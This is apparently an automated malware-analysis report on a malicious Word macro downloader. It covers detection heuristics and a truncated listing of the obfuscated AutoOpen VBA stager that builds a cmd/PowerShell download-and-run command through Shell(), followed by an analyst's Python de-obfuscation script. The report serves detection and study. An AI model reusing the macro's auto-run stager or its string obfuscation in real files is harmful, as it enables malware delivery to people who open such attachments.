Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Word document (OLE/.doc) carrying a VBA project. Its AutoOpen() procedure runs as soon as the document is opened with macros enabled, assembles a command line from dozens of concatenated string fragments, and hands it to a Shell() call, so the document is a stager for code that runs outside Word. The ClamAV name Doc.Downloader.Valyria-6922931-0 classifies it as a downloader, and the recovered macro is consistent with that: the literals visible in qAWwzR() build a cmd.exe invocation (`/V:ON/C` enables delayed environment-variable expansion and runs the command that follows) whose `set` payload is interleaved with four-character separator tokens drawn from the characters 0, 7, a and 2, a common string-obfuscation scheme. Removing those tokens and reversing what remains yields the tail of a PowerShell try/catch loop (`Invoke-Item` on a fetched file, `break`, an empty `catch`), which is the download-and-run pattern the ClamAV name implies. The two KeyString() calls in AutoOpen sum their numeric operands to 67 and 77, the Word key codes for C and M; Word's Application.KeyString() returns a key's name, which together with the leading "d" of the next literal appears to spell the interpreter name without ever writing "cmd" in the source. The bulk of the module is padding: array assignments sliced with Mid/MidB/Left/Right from variables that are never assigned in the visible code (they evaluate to Empty, so the results are empty strings) and arrays that are never read, present to dilute signatures and slow manual review. The single extracted URL is the OOXML DrawingML schema namespace and is not a network indicator; no command-and-control URL is visible in the truncated preview.
Heuristics (6)
- ClamAV: Doc.Downloader.Valyria-6922931-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Valyria-6922931-0
- VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (For this sample a VBA project was recovered, see macros.bas below, so the marker is the same AutoOpen name and adds no independent evidence.)
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard OOXML DrawingML namespace URI present in ordinary Office documents and is not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59691 bytes | 0e11a8c4c95d405f815ecee4cfdfbc2ce250c05a492d7749fd55783e72cde784 |
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "BHFnlYzH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim UwoVZ(2)
UwoVZ(0) = Mid(zQWAOYFA + siXoOzmNRizdPAqHAzzErjf + rdArKpM, 33, 336) + MidB(wCIqT + nGzYPtkssajmHVF + noCzYutI, 954, 834)
UwoVZ(1) = Mid(bhsGfTN + ZwTblKWMmlDZPzEAOkmAkq + qfcCrW, 856, 254) + Mid(XnkWwCF + CStCiTsNnvjlhmSjtjjCH + MlrnjvM, 180, 45) + Mid(dzizrfav + GzqQkViVPlhBoZDAX + iiCVBup, 27, 538) + Right(pGnAXz + JjoLvvaDFWvcLbPPTkLUn + LBTnB, 66)
Dim vrGmm(1)
vrGmm(0) = Left(OntMHAFu + PNIEqhfkXDulhlOHsi + CYKzHL, 248) + Mid(VRJKhDF + HCrpTVbZOrmJzFffP + XtVZAS, 505, 996) + Right(fTXCY + phjlwvLjwNcXZmiwUuVAB + hGqKIYs, 518) + Mid(tjYGZNQ + XLjSUXasKThiFoVYpp + jfGCGsvh, 90, 622)
Dim SwtXHZ(1)
SwtXHZ(0) = MidB(lvFQs + YsJkHzzAljjZETVnsd + GpsiZYi, 181, 372) + Right(uvrSSr + smXpBbWluFmCCIDPYnRbQ + fUMAD, 920)
Dim aAwIXV(1)
aAwIXV(0) = MidB(uVRGYRWE + wwVwISpUQGJAoXfGDF + EotOnjA, 424, 832) + Mid(GjIdr + iBNolkFktrHaKQI + PFTuP, 409, 70)
Dim qnQUWu(1)
qnQUWu(0) = Right(wTEHqwc + EEzRzzwqVijvEiNrtA + vEWHmw, 134) + Left(nrPCI + oNVjYwvwJCMkkjSDMdrQAj + tISswCX, 65)
Dim funcz(2)
funcz(0) = Right(ZPDlih + itcCfrVcbqcZQEJoE + WNkGl, 16) + Left(YhFLPWs + snYKBGumqmhVtbWPRZ + QzCIXWDD, 458) + MidB(wQatVG + iKSvDoDozdjwIKwz + CmPiHz, 592, 651) + MidB(IbEJj + wUMTOuTrsTWJTEcYD + rfVGzUIR, 900, 312)
funcz(1) = Left(zdKwn + KPFLPzzHAhIvnhzIHaLa + IbWfJ, 142) + Right(iGhmUGHR + QNHOTAczfauzoGXJTz + SMjVqMrB, 803) + Right(JjvuI + jIIPoHsNzjIBDXCmcJQHik + iYLLOknQ, 712) + Right(XZcMz + hDGmOGWwWQAdizGBnUXN + kmiNAzQ, 308)
vkBqlIWzUP (KeyString(wiArGDh + NuTsmo + 8 + 19 + 40 + cwzaK + zwBfkrJ) + YKVuW + GUNCIj + KeyString(XcwTauE + NuKBCMW + 9 + 22 + 46 + JUcTdhU + FzFiNKUH) + qAWwzR + zHZbdWlfvi + zMRpXq + IarNBSfRBfd + fbKfSD + isJFTso + kGYXHNGw)
Dim dAkjWr(1)
dAkjWr(0) = MidB(WLBhQ + ERRYGFjQzHumSiUsYStQAj + kifdbjz, 552, 631) + Right(Mkzjwj + hlnqJtvhKAQsOXvWjOpp + fbjbizjl, 688)
Dim JpTziU(1)
JpTziU(0) = MidB(vYAkR + jWwwUbwmBdOGFSMPtwOsf + jsszA, 800, 936) + MidB(rJBjVa + wAFHDIhYBiQUdQrqDnBo + huhQctSE, 652, 889) + MidB(wjjLRcn + EOsqUikpzMoKWOARPMmjl + LGsWYA, 55, 63) + Right(oaIPiOo + qnKVLzfzjRiHJizXYMl + hLrmthwz, 731)
End Sub
Attribute VB_Name = "zrWjfzTRjPVwNC"
Function qAWwzR()
Dim BNFaXO(2)
BNFaXO(0) = MidB(vBnfZN + suiXTNRBidzbLPSUhnMQp + EmVqKa, 949, 972) + Mid(oZZMGONZ + pjFsQGjrfdoaDJKUCAdREG + HbYzrqia, 387, 648)
BNFaXO(1) = Right(EhNGOOz + DbRDFwMSAmaNSjmwr + wUkQVmWC, 818) + Mid(WEzGvltV + hqAqvoibBHfzSpba + JfjqhI, 230, 711)
uNrqoXzd = "d \/ \/ /\\\ \ /" + " \ /V:ON/C" + """" + "set \" + "?,`=0a72 a072 02a" + "7 270a 720a 7" + "0a2 02a7 270a 07" + "2a a702 a720 0"
Dim RZkZf(1)
RZkZf(0) = Right(kOVPmRb + WndumrCHnVFKfkXbcRCZ + GNoBz, 572) + MidB(CwSzClc + RrTXajsCuznkUNfbCBIJC + jLjhm, 981, 877)
Dim OnPik(2)
OnPik(0) = Mid(hiUOFi + UJcwSuYlLQAOwcwmfaQTi + tHvvZ, 12, 247) + MidB(CIEmapCr + YKkGXnwwPEqQBRpclP + IZoXKL, 797, 467) + Left(OsrIB + PDOcjOYVZYhDknbj + zlIrfq, 597) + Mid(tQRUWM + ZMazomQLSLHDhrPSGkEWj + jIvtKrKs, 46, 381)
OnPik(1) = Mid(LzrfVX + VMvbcGtKVqrOrPQITz + AhbESOF, 663, 988) + MidB(aTMUQ + rihdQBTtQFOAiLhBCbEEmrc + lvuzEV, 103, 547)
Dim ivmjiw(2)
ivmjiw(0) = MidB(jTzRdElR + fjJhRSChzUtBkfR + wGjLajYq, 52, 123) + MidB(hzNCbA + NbPXccSPtZTRZzzHi + AawEaDf, 982, 163)
ivmjiw(1) = MidB(OmVqJjwR + IhfwbsodtwHmYXBOYQlu + TjiqO, 176, 330) + Right(rtTGw + wilrHzuCLwCwJXmIJFMPkiw + uERDEhU, 129)
zCpwUOb = "72a 27a0 270a 07" + "a2 027a a207 a027" + "}20a7}07a2{a702h" + "a270c0a27ta702a"
GOkQNtdssbn = "07a2ca702}70a2;07a2k" + "7a02a2a07e072ara02" + "7b270a;a270K07a2"
bwSWiwv = "ja270j072a$027a 072a" + "m0a27e270at270aI20a" + "7-27a0e720ak70a2o0a7" + "2v270an2a70I" + "027a;0a72)072aK027aj"
Dim TojFDN(1)
TojFDN(0) = Mid(rTGTK + mkPBMOKHjuPpQiLzoV + LXQlt, 308, 765) + MidB(MDujq + mEiYYIUzBDcILNdDiwXU + vnfuUG, 492, 447)
Dim
```
... (truncated)
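The separator-stripping reading of the command line can be checked directly against the literals in the preview. The Python below is an added analyst example, not code from the sample or from the analyzer. It reassembles the four string literals from qAWwzR() exactly as printed, assumes (this is not shown in the truncated preview) that the macro concatenates them in the order they appear, removes every four-character permutation of the characters 0, 7, a, 2, and reverses what remains. The function names strip_separators, decode_payload and cmd_flags are this example's own.

```python
"""Strip the separator tokens from the cmd/PowerShell string assembled in
qAWwzR() and recover the readable tail. Analyst example, not sample code."""
from itertools import permutations
import re

# The four literals as printed in the preview. VBA string literals have no
# escape characters, so the backslashes are literal, and """" is one quote.
UNRQOXZD = (r"d \/ \/ /\\\ \ /" + r" \ /V:ON/C" + '"' + "set \\"
            + "?,`=0a72 a072 02a" + "7 270a 720a 7" + "0a2 02a7 270a 07"
            + "2a a702 a720 0")
ZCPWUOB = ("72a 27a0 270a 07" + "a2 027a a207 a027" + "}20a7}07a2{a702h"
           + "a270c0a27ta702a")
GOKQNTDSSBN = ("07a2ca702}70a2;07a2k" + "7a02a2a07e072ara02"
               + "7b270a;a270K07a2")
BWSWIWV = ("ja270j072a$027a 072a" + "m0a27e270at270aI20a"
           + "7-27a0e720ak70a2o0a7" + "2v270an2a70I" + "027a;0a72)072aK027aj")

# ASSUMPTION: the literals are joined in the order they appear in the
# preview; the truncated listing does not show the final assembly.
COMMAND_LINE = UNRQOXZD + ZCPWUOB + GOKQNTDSSBN + BWSWIWV

# Every separator token seen in the payload is a 4-character permutation of
# the characters that make up the tokens listed after 'set'.
SEPARATORS = {"".join(p) for p in permutations("027a")}


def strip_separators(text: str) -> str:
    """Drop each exact separator token, scanning left to right.

    A regex such as [027a]{4} would over-match: the payload itself contains
    the letter 'a' (catch, break), so only whole permutation tokens go.
    """
    out, i = [], 0
    while i < len(text):
        if text[i:i + 4] in SEPARATORS:
            i += 4
        else:
            out.append(text[i])
            i += 1
    return "".join(out)


def decode_payload(command_line: str) -> str:
    """Return the de-obfuscated tail of the command built by the macro."""
    # Everything after the variable assignment is separator-laden payload.
    _, _, payload = command_line.partition("?,`=")
    residue = strip_separators(payload)
    # The leftover characters only read as PowerShell when reversed, so the
    # cmd stage presumably reverses them before execution. The token list
    # that opened the 'set' value collapses to spaces, which strip() drops.
    return residue[::-1].strip()


def cmd_flags(command_line: str) -> list:
    """Extract the cmd.exe switches from the prefix ahead of the quote."""
    prefix, _, _ = command_line.partition('"')
    return re.findall(r"/[A-Za-z]+(?::[A-Za-z]+)?", prefix)


if __name__ == "__main__":
    print(cmd_flags(COMMAND_LINE))
    print(decode_payload(COMMAND_LINE))
```

Running it prints `['/V:ON', '/C']` followed by `jK);Invoke-Item $jjK;break;}catch{}}`, the closing part of a PowerShell try/catch loop that opens a downloaded file and leaves the loop on success. Everything before it, including any URLs, lies past the point where the preview is truncated, so this confirms the obfuscation scheme and the downloader behaviour without recovering the infrastructure.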